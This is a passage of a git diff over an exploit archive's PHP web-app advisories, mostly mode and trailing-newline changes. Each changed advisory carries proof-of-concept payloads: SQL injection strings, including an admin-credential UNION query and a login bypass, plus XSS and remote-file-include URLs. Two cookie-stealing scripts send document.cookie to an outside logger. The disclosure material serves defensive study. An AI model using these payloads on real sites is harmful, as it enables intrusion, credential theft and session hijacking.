disclos http://www.example.com/merchant.ihtml?id=56&step=[SQL] http://www.example.com/merchant.ihtml?id=[SQL] -http://www.example.com/merchant.ihtml?pid=[SQL] \ No newline at end of file +http://www.example.com/merchant.ihtml?pid=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26857.txt b/platforms/php/webapps/26857.txt old mode 100755 new mode 100644 index c65d073f0..d5cc6630a --- a/platforms/php/webapps/26857.txt +++ b/platforms/php/webapps/26857.txt @@ -4,4 +4,4 @@ PAFileDB Extreme Edition is prone to an SQL injection vulnerability. This issue Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/pafiledb.php?news=showcontent&newsid=[SQL] \ No newline at end of file +http://www.example.com/pafiledb.php?news=showcontent&newsid=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/2686.php b/platforms/php/webapps/2686.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26866.txt b/platforms/php/webapps/26866.txt old mode 100755 new mode 100644 index abcb4c687..9ec279d8a --- a/platforms/php/webapps/26866.txt +++ b/platforms/php/webapps/26866.txt @@ -8,4 +8,4 @@ http://xxxx.com/roundcube/?_auth=cf559dcf52d8801ccd51cd1f3ba3eca08d1b0bce= &_tas Caused this error message: -**PHP Error in /usr/local/apache2/htdocs/roundcube/index.php (301)*:* Invalid request failed/file not found \ No newline at end of file +**PHP Error in /usr/local/apache2/htdocs/roundcube/index.php (301)*:* Invalid request failed/file not found \ No newline at end of file diff --git a/platforms/php/webapps/26867.txt b/platforms/php/webapps/26867.txt old mode 100755 new mode 100644 index 35546ad21..7fa442f0e --- a/platforms/php/webapps/26867.txt +++ b/platforms/php/webapps/26867.txt @@ -4,4 +4,4 @@ PHP Fusebox is prone to a cross-site scripting vulnerability. This issue is due An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/index.php?action=%3Ch1%3E%3Cmarquee%3Ehalooo%3C/marquee%3E%3C/h1%3E \ No newline at end of file +http://www.example.com/index.php?action=%3Ch1%3E%3Cmarquee%3Ehalooo%3C/marquee%3E%3C/h1%3E \ No newline at end of file diff --git a/platforms/php/webapps/26868.txt b/platforms/php/webapps/26868.txt old mode 100755 new mode 100644 index 8e910c0e7..5e15ba707 --- a/platforms/php/webapps/26868.txt +++ b/platforms/php/webapps/26868.txt @@ -5,4 +5,4 @@ JPortal Forum is prone to an SQL injection vulnerability. This issue is due to a Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. http://www.example.com/jportal/forum.php?cmd=search&word=Trey&where=author%20and%201=0%20union%20select%20null,null,nick,pass,null, -null,null,null,null,null,null,null,null,null,null,null%20from%20admins%20/* \ No newline at end of file +null,null,null,null,null,null,null,null,null,null,null%20from%20admins%20/* \ No newline at end of file diff --git a/platforms/php/webapps/2687.htm b/platforms/php/webapps/2687.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26870.txt b/platforms/php/webapps/26870.txt old mode 100755 new mode 100644 index fc6d36fd3..5d97a1f25 --- a/platforms/php/webapps/26870.txt +++ b/platforms/php/webapps/26870.txt @@ -8,4 +8,4 @@ http://www.example.com/guestbook/index.php?entry=<script>alert(document.cookie); http://www.example.com/guestbook/index.php?entry=<iframesrc=http://www.example.com/> http://www.example.com/guestbook/comment.php?gb_id=1<script>alert(document.cookie);</script> -http://www.example.com/guestbook/comment.php?gb_id=1<IFRAMESRC="javascript:alert('XSS');"></IFRAME> \ No newline at end of file +http://www.example.com/guestbook/comment.php?gb_id=1<IFRAMESRC="javascript:alert('XSS');"></IFRAME> \ No newline at end of file diff --git a/platforms/php/webapps/26871.txt b/platforms/php/webapps/26871.txt old mode 100755 new mode 100644 index 19fa10c7a..b9a5c9688 --- a/platforms/php/webapps/26871.txt +++ b/platforms/php/webapps/26871.txt @@ -4,4 +4,4 @@ PlaySmS is prone to a cross-site scripting vulnerability. This issue is due to a An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks -http://www.example.com/playsms/index.php?err=XSShere \ No newline at end of file +http://www.example.com/playsms/index.php?err=XSShere \ No newline at end of file diff --git a/platforms/php/webapps/26872.txt b/platforms/php/webapps/26872.txt old mode 100755 new mode 100644 index 6ccd6dedf..5e4ee0aa5 --- a/platforms/php/webapps/26872.txt +++ b/platforms/php/webapps/26872.txt @@ -4,4 +4,4 @@ PHP-Fusion is prone to a cross-site scripting vulnerability. This issue is due t An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/[fushion]/members.php?sortby=%3Ciframe%20src=http://www.example.com%20%3C \ No newline at end of file +http://www.example.com/[fushion]/members.php?sortby=%3Ciframe%20src=http://www.example.com%20%3C \ No newline at end of file diff --git a/platforms/php/webapps/26877.txt b/platforms/php/webapps/26877.txt old mode 100755 new mode 100644 index 88744301e..1caf86921 --- a/platforms/php/webapps/26877.txt +++ b/platforms/php/webapps/26877.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th Amaxus CMS verions 3 and earlier are reportedly prone to this issue. -http://example.com/?search_word=&search.x=20&search.y=4&change=[XSS] \ No newline at end of file +http://example.com/?search_word=&search.x=20&search.y=4&change=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/26878.txt b/platforms/php/webapps/26878.txt old mode 100755 new mode 100644 index a4e98c0da..359485845 --- a/platforms/php/webapps/26878.txt +++ b/platforms/php/webapps/26878.txt @@ -17,4 +17,4 @@ iewer_attrs=[XSS] http://www.example.com/Introduction?&CB=CB1&fileDN=mnF%3D2. 3.html%2CmnOD%3DNews%2CmnOD%3DMy%20D ocuments%2Cdc%3Demanuel%2Cdc%3Dmenno -nite%2Cdc%3Dnet&folderviewer_attrs=[XSS] \ No newline at end of file +nite%2Cdc%3Dnet&folderviewer_attrs=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/26879.txt b/platforms/php/webapps/26879.txt old mode 100755 new mode 100644 index 93ca77f43..a4016c220 --- a/platforms/php/webapps/26879.txt +++ b/platforms/php/webapps/26879.txt @@ -4,4 +4,4 @@ Cofax is prone to a cross-site scripting vulnerability. This issue is due to a f An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/search.htm?searchstring2=&searchstring=[XSS] \ No newline at end of file +http://www.example.com/search.htm?searchstring2=&searchstring=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/2688.txt b/platforms/php/webapps/2688.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26880.txt b/platforms/php/webapps/26880.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26881.txt b/platforms/php/webapps/26881.txt old mode 100755 new mode 100644 index 48a9103e0..57fff5c9d --- a/platforms/php/webapps/26881.txt +++ b/platforms/php/webapps/26881.txt @@ -4,4 +4,4 @@ FLIP is prone to multiple cross-site scripting vulnerabilities. These issues are An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/forum.php?frame=[XSS] \ No newline at end of file +http://www.example.com/forum.php?frame=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/26883.txt b/platforms/php/webapps/26883.txt old mode 100755 new mode 100644 index 46baa81f3..0e32000cf --- a/platforms/php/webapps/26883.txt +++ b/platforms/php/webapps/26883.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th This issue affects Enterprise CMS version 3.0; earlier versions may also be vulnerable. -http://www.example.com/search/index.php?advanced=0&associated_list=&page=1&search=0&page_search=[XSS] \ No newline at end of file +http://www.example.com/search/index.php?advanced=0&associated_list=&page=1&search=0&page_search=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/26884.txt b/platforms/php/webapps/26884.txt old mode 100755 new mode 100644 index 56de9626e..18fda6ebc --- a/platforms/php/webapps/26884.txt +++ b/platforms/php/webapps/26884.txt @@ -8,4 +8,4 @@ These issues affect version 3.6.1; earlier versions may also be vulnerable. http://www.example.com/web/guest/downloads/portal_ent?p_p_id=77&p_p_action=1&p_p_state=maximized&p_p_mode=view&p_p_col_order=null&p_p_col_pos=2&p_p_col_count=3&_77_struts_action=[XSS] http://www.example.com/web/guest/downloads/portal_ent?p_p_id=77&p_p_action=1&p_p_state=maximized&p_p_mode=[XSS] -http://www.example/com/web/guest/downloads/portal_ent?p_p_id=77&p_p_action=1&p_p_state=[XSS] \ No newline at end of file +http://www.example/com/web/guest/downloads/portal_ent?p_p_id=77&p_p_action=1&p_p_state=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/26885.txt b/platforms/php/webapps/26885.txt old mode 100755 new mode 100644 index 9b0e1dd25..e317be2c2 --- a/platforms/php/webapps/26885.txt +++ b/platforms/php/webapps/26885.txt @@ -8,4 +8,4 @@ This issue affects version 1.1; other versions may also be vulnerable. NOTE: The vendor disputes this issue, stating that Lighthouse is an application server and is not susceptible to client-side cross-site scripting attacks. -http://www.example.com/?search=[XSS] \ No newline at end of file +http://www.example.com/?search=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/26893.txt b/platforms/php/webapps/26893.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26894.txt b/platforms/php/webapps/26894.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26895.txt b/platforms/php/webapps/26895.txt old mode 100755 new mode 100644 index e0415caa3..0bcb42d81 --- a/platforms/php/webapps/26895.txt +++ b/platforms/php/webapps/26895.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th This issue affects version 2.1; other versions may also be vulnerable. -http://www.example.com/search.html?query=[XSS] \ No newline at end of file +http://www.example.com/search.html?query=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/26896.txt b/platforms/php/webapps/26896.txt old mode 100755 new mode 100644 index 348766103..9402ce38e --- a/platforms/php/webapps/26896.txt +++ b/platforms/php/webapps/26896.txt @@ -6,4 +6,4 @@ Successful exploitation could allow an attacker to compromise the application, a Version 3.1 and prior are vulnerable; other versions may also be affected. -http://www.example.com/index.php?StoryID=[SQL] \ No newline at end of file +http://www.example.com/index.php?StoryID=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26897.txt b/platforms/php/webapps/26897.txt old mode 100755 new mode 100644 index bda7b2944..1147e91cb --- a/platforms/php/webapps/26897.txt +++ b/platforms/php/webapps/26897.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Version 4.9 and prior are vulnerable; other versions may also be affected. -http://www.example.com/?setLang=[SQL] \ No newline at end of file +http://www.example.com/?setLang=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26898.txt b/platforms/php/webapps/26898.txt old mode 100755 new mode 100644 index 2c48628a9..d7710203f --- a/platforms/php/webapps/26898.txt +++ b/platforms/php/webapps/26898.txt @@ -4,4 +4,4 @@ ODFaq is prone to an SQL injection vulnerability. This issue is due to a failure Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/faq.php?cat=1[SQL] \ No newline at end of file +http://www.example.com/faq.php?cat=1[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26899.txt b/platforms/php/webapps/26899.txt old mode 100755 new mode 100644 index 2b0620619..d83621d05 --- a/platforms/php/webapps/26899.txt +++ b/platforms/php/webapps/26899.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Version 2.7 and prior are vulnerable; other versions may also be affected. -http://www.example.com/index.php?show=[SQL] \ No newline at end of file +http://www.example.com/index.php?show=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26900.txt b/platforms/php/webapps/26900.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26901.txt b/platforms/php/webapps/26901.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26902.txt b/platforms/php/webapps/26902.txt old mode 100755 new mode 100644 index 53dd26564..e67fc5fe8 --- a/platforms/php/webapps/26902.txt +++ b/platforms/php/webapps/26902.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Version 1.0 RC4 and prior are vulnerable; other versions may also be affected. -http://www.example.com/article.php?cat=[SQL] \ No newline at end of file +http://www.example.com/article.php?cat=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26904.txt b/platforms/php/webapps/26904.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26905.txt b/platforms/php/webapps/26905.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26906.txt b/platforms/php/webapps/26906.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26907.txt b/platforms/php/webapps/26907.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26908.txt b/platforms/php/webapps/26908.txt old mode 100755 new mode 100644 index 94781a71a..bc17c5caf --- a/platforms/php/webapps/26908.txt +++ b/platforms/php/webapps/26908.txt @@ -6,4 +6,4 @@ Successful exploitation of these vulnerabilities could result in a compromise of bitweaver 1.1.1 beta and prior are vulnerable; other versions may also be affected. -http://www.example.com/users/my.php?sort_mode=[SQL] \ No newline at end of file +http://www.example.com/users/my.php?sort_mode=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/2691.txt b/platforms/php/webapps/2691.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26911.txt b/platforms/php/webapps/26911.txt old mode 100755 new mode 100644 index 7ca403fbc..31b1aaaad --- a/platforms/php/webapps/26911.txt +++ b/platforms/php/webapps/26911.txt @@ -6,4 +6,4 @@ Successful exploitation of these vulnerabilities could result in a compromise of These issues affect Komodo CMS version 2.1; other versions may also be vulnerable. -http://www.example.com/page.php?page=[SQL] \ No newline at end of file +http://www.example.com/page.php?page=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26912.txt b/platforms/php/webapps/26912.txt old mode 100755 new mode 100644 index 6ea122e4f..2c50cfe67 --- a/platforms/php/webapps/26912.txt +++ b/platforms/php/webapps/26912.txt @@ -8,4 +8,4 @@ These issues affect version 4.0; other versions may also be vulnerable. http://www.example.com/index.cfm?page=[SQL] http://www.example.com/index.cfm?page=40&criteria=&start=11&title=&content=[XSS] -http://www.example.com/index.cfm?restricted=false&page=10&criteria=[XSS] \ No newline at end of file +http://www.example.com/index.cfm?restricted=false&page=10&criteria=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/26916.txt b/platforms/php/webapps/26916.txt old mode 100755 new mode 100644 index e5a97a30b..9e10714a6 --- a/platforms/php/webapps/26916.txt +++ b/platforms/php/webapps/26916.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos The following proof of concept is available: username 'or isnull(1/0) /* -password (no password required) \ No newline at end of file +password (no password required) \ No newline at end of file diff --git a/platforms/php/webapps/26918.txt b/platforms/php/webapps/26918.txt old mode 100755 new mode 100644 index 4725594f2..b2e779ac5 --- a/platforms/php/webapps/26918.txt +++ b/platforms/php/webapps/26918.txt @@ -4,4 +4,4 @@ Plogger is prone to a remote file include vulnerability. An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the Web server process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. -http://www.example.com/PATH/admin/plog-admin-functions.php?config[basedir]=http://www.example.com/[code] \ No newline at end of file +http://www.example.com/PATH/admin/plog-admin-functions.php?config[basedir]=http://www.example.com/[code] \ No newline at end of file diff --git a/platforms/php/webapps/26919.txt b/platforms/php/webapps/26919.txt old mode 100755 new mode 100644 index d44789efd..021bc9c53 --- a/platforms/php/webapps/26919.txt +++ b/platforms/php/webapps/26919.txt @@ -4,4 +4,4 @@ D-Man is prone to a cross-site scripting vulnerability. This issue is due to a f An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. -http://www.example.com/index.php?go=admin&do=do_search&du=usergroup&title=[code]&search=single \ No newline at end of file +http://www.example.com/index.php?go=admin&do=do_search&du=usergroup&title=[code]&search=single \ No newline at end of file diff --git a/platforms/php/webapps/2692.txt b/platforms/php/webapps/2692.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26921.txt b/platforms/php/webapps/26921.txt old mode 100755 new mode 100644 index f936e0238..70cf7db9e --- a/platforms/php/webapps/26921.txt +++ b/platforms/php/webapps/26921.txt @@ -4,4 +4,4 @@ Tolva is prone to a remote file-include vulnerability. An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/twebs/modules/misc/usermods.php?ROOT=http://www.example.com \ No newline at end of file +http://www.example.com/twebs/modules/misc/usermods.php?ROOT=http://www.example.com \ No newline at end of file diff --git a/platforms/php/webapps/26923.txt b/platforms/php/webapps/26923.txt old mode 100755 new mode 100644 index 34a38b9b7..d24983a07 --- a/platforms/php/webapps/26923.txt +++ b/platforms/php/webapps/26923.txt @@ -4,4 +4,4 @@ Beehive Forum is prone to multiple HTML injection vulnerabilities. These issues Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit these issues to control how the site is rendered to the user; other attacks are also possible. -<script>document.location.replace='http://www.example.com/cgi-bin/evil_cookie_logger.cgi?'+document.cookie</script> \ No newline at end of file +<script>document.location.replace='http://www.example.com/cgi-bin/evil_cookie_logger.cgi?'+document.cookie</script> \ No newline at end of file diff --git a/platforms/php/webapps/26925.txt b/platforms/php/webapps/26925.txt old mode 100755 new mode 100644 index 600bbf17e..e26bc7158 --- a/platforms/php/webapps/26925.txt +++ b/platforms/php/webapps/26925.txt @@ -5,4 +5,4 @@ papaya CMS is prone to a cross-site scripting vulnerability. This issue is due t An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. Proof of concept is available: -/suche.153.html?bab[page]=6&bab[searchfor]=[XSS] \ No newline at end of file +/suche.153.html?bab[page]=6&bab[searchfor]=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/2693.txt b/platforms/php/webapps/2693.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26938.txt b/platforms/php/webapps/26938.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26939.txt b/platforms/php/webapps/26939.txt old mode 100755 new mode 100644 index e0daaecdb..fbd9f4255 --- a/platforms/php/webapps/26939.txt +++ b/platforms/php/webapps/26939.txt @@ -11,4 +11,4 @@ http://www.example.com/story/2005/11/4/184932[XSS] http://www.example.com/story/2005/11/4[XSS] http://www.example.com/story/2005/11[XSS] http://www.example.com/story/2005[XSS] -http://www.example.com/story/[XSS] \ No newline at end of file +http://www.example.com/story/[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/2694.php b/platforms/php/webapps/2694.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26955.txt b/platforms/php/webapps/26955.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26958.txt b/platforms/php/webapps/26958.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26959.txt b/platforms/php/webapps/26959.txt old mode 100755 new mode 100644 index b9139a50e..fc4cbb5e7 --- a/platforms/php/webapps/26959.txt +++ b/platforms/php/webapps/26959.txt @@ -6,4 +6,4 @@ Successful exploitation could allow an attacker to compromise the application, a These issues affect version 2.1.2; other versions may also be vulnerable. -http://www.example.com/index.php?menuid=[SQL] \ No newline at end of file +http://www.example.com/index.php?menuid=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/2696.php b/platforms/php/webapps/2696.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26960.txt b/platforms/php/webapps/26960.txt old mode 100755 new mode 100644 index 75262829d..53c9982c6 --- a/platforms/php/webapps/26960.txt +++ b/platforms/php/webapps/26960.txt @@ -6,4 +6,4 @@ Successful exploitation could allow an attacker to compromise the application, a These issues affect version 2.1.2; other versions may also be vulnerable. -http://www.example.com/guestbook.php?menuid=[SQL] \ No newline at end of file +http://www.example.com/guestbook.php?menuid=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26961.txt b/platforms/php/webapps/26961.txt old mode 100755 new mode 100644 index d126ea508..0429e57e4 --- a/platforms/php/webapps/26961.txt +++ b/platforms/php/webapps/26961.txt @@ -7,4 +7,4 @@ Successful exploitation could allow an attacker to compromise the application, a These issues affect version 2.1.2; other versions may also be vulnerable. http://www.example.com/print.php?reporeid_print=&forumid=[SQL] -http://www.example.com/print.php?reporeid_print=[SQL] \ No newline at end of file +http://www.example.com/print.php?reporeid_print=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26962.txt b/platforms/php/webapps/26962.txt old mode 100755 new mode 100644 index 6baeee3e0..79a11ce3e --- a/platforms/php/webapps/26962.txt +++ b/platforms/php/webapps/26962.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos This issue affects phpSlash version 0.8.1; other versions may also be vulnerable. -http://www.example.com/article.php?story_id=1[SQL] \ No newline at end of file +http://www.example.com/article.php?story_id=1[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26965.txt b/platforms/php/webapps/26965.txt old mode 100755 new mode 100644 index 630e85bc1..ff05e2981 --- a/platforms/php/webapps/26965.txt +++ b/platforms/php/webapps/26965.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos This issue affects MusicBox version 2.3; other versions may also be vulnerable. -http://www.example.com/version2.3/?action=top&show=5&type=[sql] \ No newline at end of file +http://www.example.com/version2.3/?action=top&show=5&type=[sql] \ No newline at end of file diff --git a/platforms/php/webapps/26968.txt b/platforms/php/webapps/26968.txt old mode 100755 new mode 100644 index 253de65a8..cc3b01e60 --- a/platforms/php/webapps/26968.txt +++ b/platforms/php/webapps/26968.txt @@ -4,4 +4,4 @@ SyntaxCMS is prone to a cross-site scripting vulnerability. This issue is due to An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -/search/?search_query=[XSS] \ No newline at end of file +/search/?search_query=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/2697.php b/platforms/php/webapps/2697.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26973.txt b/platforms/php/webapps/26973.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26974.txt b/platforms/php/webapps/26974.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26975.txt b/platforms/php/webapps/26975.txt old mode 100755 new mode 100644 index bfeca39bc..7e9c77b96 --- a/platforms/php/webapps/26975.txt +++ b/platforms/php/webapps/26975.txt @@ -4,4 +4,4 @@ Cerberus Helpdesk is prone to multiple cross-site scripting and SQL injection vu The cross-site scripting vulnerability may permit a remote attacker to steal cookie-based authentication credentials from legitimate users. Successful exploitation of SQL injection vulnerabilities could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/cerberus-gui/display_ticket_thread.php?type=comment&sid=a640d024f84be01320aacb0ec6c87d74&ticket=[SQL] \ No newline at end of file +http://www.example.com/cerberus-gui/display_ticket_thread.php?type=comment&sid=a640d024f84be01320aacb0ec6c87d74&ticket=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26976.txt b/platforms/php/webapps/26976.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26977.txt b/platforms/php/webapps/26977.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26978.txt b/platforms/php/webapps/26978.txt old mode 100755 new mode 100644 index f6945195e..b94787f0c --- a/platforms/php/webapps/26978.txt +++ b/platforms/php/webapps/26978.txt @@ -10,4 +10,4 @@ http://example.com/[path]/add.php?language[SPECIFY_ZONE]=");}}--></script><scrip http://example.com/[path]/add.php?language[ENTER_ARTICLE_HEADER]=");}}--></script><script>alert(document.cookie)</script> -http://example.com/[path]/add.php?language[ENTER_ARTICLE_BODY]=");}}--></script><script>alert(document.cookie)</script> \ No newline at end of file +http://example.com/[path]/add.php?language[ENTER_ARTICLE_BODY]=");}}--></script><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/26979.txt b/platforms/php/webapps/26979.txt old mode 100755 new mode 100644 index 0be4bd5fa..ea02594e0 --- a/platforms/php/webapps/26979.txt +++ b/platforms/php/webapps/26979.txt @@ -10,4 +10,4 @@ Merak Mail Server 8.3.0.r and VisNetic MailServer 8.3.0 build 1 are affected by UPDATE (July 30, 2007): Symantec has confirmed that this issue is being actively exploited in the wild. -http://example.com:32000/accounts/inc/include.php?language=0&lang_settings[0][1]=http://[host]/ \ No newline at end of file +http://example.com:32000/accounts/inc/include.php?language=0&lang_settings[0][1]=http://[host]/ \ No newline at end of file diff --git a/platforms/php/webapps/26980.txt b/platforms/php/webapps/26980.txt old mode 100755 new mode 100644 index bead04e8b..ba16722cc --- a/platforms/php/webapps/26980.txt +++ b/platforms/php/webapps/26980.txt @@ -10,4 +10,4 @@ Merak Mail Server 8.3.0.r and VisNetic MailServer 8.3.0 build 1 are affected by UPDATE (July 30, 2007): Symantec has confirmed that this issue is being actively exploited in the wild. -http://example.com:32000/admin/inc/include.php?language=0&lang_settings[0][1]=http://[host]/ \ No newline at end of file +http://example.com:32000/admin/inc/include.php?language=0&lang_settings[0][1]=http://[host]/ \ No newline at end of file diff --git a/platforms/php/webapps/26981.txt b/platforms/php/webapps/26981.txt old mode 100755 new mode 100644 index b85a3dfb7..2f2f06d67 --- a/platforms/php/webapps/26981.txt +++ b/platforms/php/webapps/26981.txt @@ -10,4 +10,4 @@ Merak Mail Server 8.3.0.r and VisNetic MailServer 8.3.0 build 1 are affected by UPDATE (July 30, 2007): Symantec has confirmed that this issue is being actively exploited in the wild. -http://example.com:32000/dir/include.html?lang=[file]%00 \ No newline at end of file +http://example.com:32000/dir/include.html?lang=[file]%00 \ No newline at end of file diff --git a/platforms/php/webapps/26982.txt b/platforms/php/webapps/26982.txt old mode 100755 new mode 100644 index ca01b38fb..7d3f5041d --- a/platforms/php/webapps/26982.txt +++ b/platforms/php/webapps/26982.txt @@ -11,4 +11,4 @@ Merak Mail Server 8.3.0.r and VisNetic MailServer 8.3.0 build 1 are affected by UPDATE (July 30, 2007): Symantec has confirmed that this issue is being actively exploited in the wild. -http://example.com:32000/mail/settings.html?id=[current_id]&Save_x=1&language=TEST \ No newline at end of file +http://example.com:32000/mail/settings.html?id=[current_id]&Save_x=1&language=TEST \ No newline at end of file diff --git a/platforms/php/webapps/26983.txt b/platforms/php/webapps/26983.txt old mode 100755 new mode 100644 index 1341b0e0a..14baa3553 --- a/platforms/php/webapps/26983.txt +++ b/platforms/php/webapps/26983.txt @@ -11,4 +11,4 @@ Merak Mail Server 8.3.0.r and VisNetic MailServer 8.3.0 build 1 are affected by UPDATE (July 30, 2007): Symantec has confirmed that this issue is being actively exploited in the wild. -http://example.com:32000/mail/index.html?id=[current_id]&lang_settings[TEST]=test;http://[host]/; \ No newline at end of file +http://example.com:32000/mail/index.html?id=[current_id]&lang_settings[TEST]=test;http://[host]/; \ No newline at end of file diff --git a/platforms/php/webapps/26984.txt b/platforms/php/webapps/26984.txt old mode 100755 new mode 100644 index 29a721f9a..2809f6276 --- a/platforms/php/webapps/26984.txt +++ b/platforms/php/webapps/26984.txt @@ -10,4 +10,4 @@ Merak Mail Server 8.3.0.r and VisNetic MailServer 8.3.0 build 1 are affected by UPDATE (July 30, 2007): Symantec has confirmed that this issue is being actively exploited in the wild. -http://example.com:32000/mail/index.html?/mail/index.html?default_layout=OUTLOOK2003&layout_settings[OUTLOOK2003]=test;[file]%00;2 \ No newline at end of file +http://example.com:32000/mail/index.html?/mail/index.html?default_layout=OUTLOOK2003&layout_settings[OUTLOOK2003]=test;[file]%00;2 \ No newline at end of file diff --git a/platforms/php/webapps/26988.txt b/platforms/php/webapps/26988.txt old mode 100755 new mode 100644 index f99783c53..0fc0a45cd --- a/platforms/php/webapps/26988.txt +++ b/platforms/php/webapps/26988.txt @@ -9,4 +9,4 @@ Attacker-supplied HTML and script code would be able to access properties of the Koobi 5 is reportedly prone to this vulnerability. [color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite/cookies.php? -c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color] \ No newline at end of file +c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color] \ No newline at end of file diff --git a/platforms/php/webapps/26989.txt b/platforms/php/webapps/26989.txt old mode 100755 new mode 100644 index 80eb906b6..03c19a0a2 --- a/platforms/php/webapps/26989.txt +++ b/platforms/php/webapps/26989.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th GMailSite 1.0.4 and prior versions are affected by this issue. GFHost 0.4.2 and prior versions are also vulnerable. http://www.example.com/?lng=es"><script>alert(document.cookie)</script> -http://www.example.com/index.php?lng=es"><script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/index.php?lng=es"><script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/26990.txt b/platforms/php/webapps/26990.txt old mode 100755 new mode 100644 index 9f67f821f..01f574ba8 --- a/platforms/php/webapps/26990.txt +++ b/platforms/php/webapps/26990.txt @@ -8,4 +8,4 @@ Successful exploitation can allow an attacker to bypass authentication and gain 